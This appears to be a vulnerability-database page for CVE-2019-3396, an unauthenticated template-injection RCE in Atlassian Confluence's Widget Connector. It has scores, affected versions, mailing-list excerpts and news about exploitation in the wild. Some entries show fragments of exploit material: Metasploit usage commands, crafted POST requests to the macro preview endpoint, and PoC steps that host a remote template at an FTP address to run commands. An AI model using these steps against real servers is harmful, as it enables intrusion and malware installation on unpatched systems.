
CVE-2019-3396

Published: 25/03/2019 Updated: 22/04/2019
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 prior to 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 prior to 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 prior to 6.14.2 (the fixed version for 6.14.x), allows remote malicious users to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.

Affected Products

Vendor: Atlassian
Product: Confluence
Versions: 1.0, 1.0.1, 1.0.3, 1.1, 1.1.1, 1.1.2, 1.2, 1.2.1, 1.2.2, 1.2.3, 1.3, 1.3.1, 1.3.2, 1.3.4, 1.3.5, 1.3.6, 1.4, 1.4.1, 1.4.2, 1.4.3, 1.4.4, 2.6, 2.6.1, 2.6.2, 2.6.3, 2.7, 2.7.1, 2.7.2, 2.7.3, 2.7.4, 2.8, 2.8.1, 2.8.2, 2.8.3, 2.9, 2.9.1, 2.9.2, 2.9.3, 2.10, 2.10.1, 2.10.2, 2.10.3, 2.10.4, 3.0, 3.0.1, 3.0.2, 3.1, 3.1.1, 3.1.2, 3.2, 3.2.1, 3.3, 3.3.1, 3.3.3, 3.4, 3.4.1, 3.4.2, 3.4.3, 3.4.5, 3.4.6, 3.4.7, 3.4.8, 3.4.9, 3.5, 3.5.1, 3.5.2, 3.5.3, 3.5.4, 3.5.5, 3.5.6, 3.5.7, 3.5.9, 3.5.11, 3.5.13, 4.0, 4.0.3, 4.0.4, 4.0.5, 4.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.1.6, 4.1.7, 4.1.9, 4.3, 4.3.1, 4.3.2, 4.3.3, 4.3.5, 4.3.6, 4.3.7, 5.0, 5.0.1, 5.0.2, 5.0.3, 5.1, 5.1.1, 5.1.2, 5.1.3, 5.1.4, 5.1.5, 5.2.3, 5.2.4, 5.2.5, 5.3, 5.3.1, 5.3.4, 5.4, 5.4.1, 5.4.2, 5.4.3, 5.4.4, 5.5, 5.5.0, 5.5.1, 5.5.2, 5.5.3, 5.5.6, 5.5.7, 5.6, 5.6.1, 5.6.3, 5.6.4, 5.6.5, 5.6.6, 5.7, 5.7.1, 5.7.3, 5.7.4, 5.7.5, 5.7.6, 5.8.2, 5.8.4, 5.8.5, 5.8.6, 5.8.8, 5.8.9, 5.8.10, 5.8.13, 5.8.14, 5.8.15, 5.8.16, 5.8.17, 5.8.18, 5.9.1, 5.9.2, 5.9.3, 5.9.4, 5.9.5, 5.9.6, 5.9.7, 5.9.8, 5.9.9, 5.9.10, 5.9.11, 5.9.12, 5.9.14, 5.10, 5.10.0, 5.10.1, 5.10.2, 5.10.3, 5.10.4, 5.10.5, 5.10.6, 5.10.7, 5.10.8, 6.0, 6.0.1, 6.0.2, 6.0.3, 6.0.4, 6.0.5, 6.0.6, 6.0.7, 6.1, 6.1.1, 6.1.2, 6.1.3, 6.1.4, 6.2, 6.2.1, 6.2.2, 6.2.3, 6.2.4, 6.3, 6.3.1, 6.3.2, 6.3.3, 6.3.4, 6.4, 6.4.1, 6.4.2, 6.4.3, 6.5, 6.5.1, 6.5.2, 6.5.3, 6.6, 6.6.1, 6.6.2, 6.6.3, 6.6.4, 6.6.5, 6.6.6, 6.6.7, 6.6.8, 6.6.9, 6.6.10, 6.6.11, 6.7.0, 6.7.1, 6.7.2, 6.7.3, 6.8, 6.8.1, 6.8.2, 6.8.3, 6.8.5, 6.9, 6.9.1, 6.9.3, 6.10, 6.10.1, 6.10.2, 6.11, 6.11.1, 6.11.2, 6.12, 6.12.1, 6.12.2, 6.13.0, 6.13.1, 6.13.2, 6.14.0, 6.14.1

Exploits

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remo ...

Mailing Lists

Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embedding online videos, slideshows, photostreams and more directly into a page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is not required to exploit this vulnerability. By default, ...

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

This email refers to the advisory found at confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2019-03-20

CVE ID:
* CVE-2019-3395
* CVE-2019-3396

Product: Confluence Server and Confluence Data Center

Affected Confluence Server and Confluence Data Center product vers ...

Metasploit Modules

Atlassian Confluence Widget Connector Macro Velocity Template Injection

Widget Connector Macro is part of Atlassian Confluence Server and Data Center that allows embedding online videos, slideshows, photostreams and more directly into a page. A _template parameter can be used to inject remote Java code into a Velocity template, and gain code execution. Authentication is not required to exploit this vulnerability. By default, a Java payload will be used because it is cross-platform, but you can also specify which native payload you want (Linux or Windows). Confluence before version 6.6.12, from version 6.7.0 before 6.12.3, from version 6.13.0 before 6.13.3 and from version 6.14.0 before 6.14.2 are affected. This vulnerability was originally discovered by Daniil Dmitriev https://twitter.com/ddv_ua.

msf > use exploit/multi/http/confluence_widget_connector
msf exploit(confluence_widget_connector) > show targets
    ...targets...
msf exploit(confluence_widget_connector) > set TARGET <target-id>
msf exploit(confluence_widget_connector) > show options
    ...show and set options...
msf exploit(confluence_widget_connector) > exploit

Github Repositories

CVE-2019-3396

test1 github.com/Yt1g3r/CVE-2019-3396_EXP.git

CVE-2019-3396 Confluence unauthenticated RCE (CVE-2019-3396) vulnerability. Pitfall: some versions require a Referer header before the request succeeds.

File Read

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: 101020181
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: g

CVE-2019-3396_EXP: CVE-2019-3396 confluence SSTI RCE
1. Put the cmd.vm on your website (must use ftp or https; http doesn't work).
2. Modify RCE_exp.py, change the filename = 'ftp://1.1.1.1/cmd.vm' (python -m pyftpdlib -p 21).
3. python REC_exp.py testwiki_testcc:8080 "whoami"
$ python REC_exp.py testwiki_testcc:8080 "id&q

CVE-2019-3396 Confluence Widget Connector path traversal (CVE-2019-3396) RCE POC

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: xxxx
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Content-Type: application/json; charset=utf-8
Referer: xxxx/pages/resumedraft.action?draf

CVE-2019-3396 Confluence RCE vulnerability detection script

Overview: This project stores some vulnerability detection/exploitation scripts written from time to time and, barring surprises, will be updated continuously. Existing POCs: ThinkPHP v5 RCE vulnerability; Confluence RCE vulnerability, CVE-2019-3396; WebLogic wls async unserialization RCE vulnerability, CVE-2019-2795

EGI Foundation Security Announcements
2019-04-10 security incident affecting collaboration tools
2019-04-16 Initial public announcement
Last Wednesday, 10 April 2019, an intrusion was detected on the site used to host collaboration services for EGI, including the EGI SSO Identity Provider, Confluence installation of the EGI Foundation and the EOSC-hub and ENVRI+ projects. The f

Confluence SSRF security vulnerability malware clean-up tool (kerberods). Built out of frustration with SSRF attacks exploiting a Confluence security vulnerability. Read the full Confluence security advisory e-mail (Korean translation). CVE-2019-3396: there is active exploitation attacking the Widget Connector vulnerability (Confluence Security Advisory -

This is the official repository for the UnderattackToday Python module. UnderattackToday: Underattack is a free security intelligence platform. For more information please visit underattack.today. API: Underattack provides a free API described here: portal.underattack.today/api/docs. To use it you should register to the portal, it's free :) The Python module

Project overview: information gathering, attack attempts to gain access, persistence, privilege escalation, network information gathering, lateral movement, data analysis (with further persistence built on top of that), covering tracks. Security-related resource list: arxiv.org, Cornell University open documents; github.com/sindresorhus/awesome, the awesome series; www.owasp.org.cn/ow

Recent Articles

New Godlua Malware Evades Traffic Monitoring via DNS over HTTPS
BleepingComputer • Sergiu Gatlan • 03 Jul 2019

A Lua-based backdoor malware capable of targeting both Linux and Windows users while securing its communication channels via DNS over HTTPS (DoH) was discovered by researchers at Network Security Research Lab of Qihoo 360.
By using DoH to encapsulate the communication channels between command-and-control servers, the infected machines, and the attacker-controlled servers within HTTPS requests, the malware dubbed Godlua manages to block researchers from analyzing its traffic.
Godl...

Confluence Servers Hacked to Install Miners and Rootkits
BleepingComputer • Ionut Ilascu • 07 May 2019

After getting pounded with ransomware and malware for deploying distributed denial-of-service (DDoS) attacks, unpatched Confluence servers are now compromised to mine for cryptocurrency.
On March 20, Atlassian released patches for two critical-severity vulnerabilities affecting Confluence Server and Confluence Data Center. Of these, CVE-2019-3396 is a server-side template injection in the Widget Connector that can lead to remote code execution.
Three weeks later, cybercriminals crea...

Vulnerable Confluence Servers Get Infected with Ransomware, Trojans
BleepingComputer • Sergiu Gatlan • 26 Apr 2019

A critical Atlassian Confluence Server vulnerability is being remotely exploited by attackers to compromise both Linux and Windows servers, allowing them to drop GandCrab ransomware and the Dofloo (aka AES.DDoS, Mr. Black) Trojan.
The CVE-2019-3396 server-side template injection vulnerability is present in the Widget Connector in vulnerable versions and it allows "remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via serve...